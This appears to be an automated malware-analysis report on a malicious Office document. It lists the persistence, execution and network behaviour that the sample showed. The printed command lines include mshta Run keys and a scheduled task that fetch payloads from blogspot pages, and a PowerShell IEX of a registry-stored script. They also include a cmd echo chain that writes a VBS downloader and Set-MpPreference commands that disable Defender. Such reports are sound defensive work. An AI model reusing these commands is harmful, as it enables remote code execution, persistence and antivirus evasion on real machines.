Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'phulihoja' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).cutona)|IEX"", 0 : window.clo...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'dkkkksakdosexography' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://backbones1234511a.blogspot.com/p/new...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://startthepartyup.blogspot.com/p/backbone15.html"", 0 : wi...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'nunukhaoo' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://ghostbackbone123.blogspot.com/p/ghostbackup14.h...
Creates or modifies the following files
- <SYSTEM32>\tasks\tutipajikhana
Malicious functions
Executes the following
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
- '<SYSTEM32>\taskkill.exe' /f /im EXCEL.exe
Executes the following (exploit)
- '%ProgramFiles%\microsoft office\office14\winword.exe'
- '<SYSTEM32>\mshta.exe' http://12##########91823%12384928198391823@j.mp/dokdwkkwkdwkdkoasldokppoodosaskkdkwk
- '<SYSTEM32>\ping.exe'
- '<SYSTEM32>\ping.exe' 127.0.0.1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBehaviorMonitoring $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBlockAtFirstSeen $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIOAVProtection $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableScriptScanning $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -SubmitSamplesConsent 2
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -MAPSReporting 0
Modifies file system
Creates the following files
- C:\users\public\siggiaw.vbs
Deletes the following files
- C:\users\public\siggiaw.vbs
Network activity
Connects to
- 'j.#p':80
- 'my######harp.blogspot.com':443
- 'bl##ger.com':443
- 're#####es.blogblog.com':443
- 'fo###.#oogleapis.com':443
- 'go#####analytics.com':443
- 'ia#####8.us.archive.org':443
TCP
- 'my######harp.blogspot.com':443
- 'bl##ger.com':443
- 're#####es.blogblog.com':443
- 'fo###.#oogleapis.com':443
- 'go#####analytics.com':443
- 'ia#####8.us.archive.org':443
UDP
- DNS ASK j.#p
- DNS ASK my######harp.blogspot.com
- DNS ASK bl##ger.com
- DNS ASK re#####es.blogblog.com
- DNS ASK fo###.#oogleapis.com
- DNS ASK go#####analytics.com
- DNS ASK ia#####8.us.archive.org
Miscellaneous
Searches for the following windows
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
Creates and executes the following
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\SiggiaW.vbs"
- '%ProgramFiles%\microsoft office\office14\winword.exe' ' (with hidden window)
- '<SYSTEM32>\mshta.exe' http://12##########91823%12384928198391823@j.mp/dokdwkkwkdwkdkoasldokppoodosaskkdkwk' (with hidden window)
- '<SYSTEM32>\ping.exe' ' (with hidden window)
- '<SYSTEM32>\ping.exe' 127.0.0.1' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit ((gp HKCU:\Software).cutona)|IEX' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta https://randikhanaekminar.blogspot.com/p/divine111.h...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW....' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring $true' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBehaviorMonitoring $true' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableBlockAtFirstSeen $true' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIOAVProtection $true' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableScriptScanning $true' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -SubmitSamplesConsent 2' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -MAPSReporting 0' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit ((gp HKCU:\Software).cutona)|IEX
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta https://randikhanaekminar.blogspot.com/p/divine111.h...
- '<SYSTEM32>\cmd.exe' /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW....
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\bin.vbs"
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\bin.vbs" /elevate
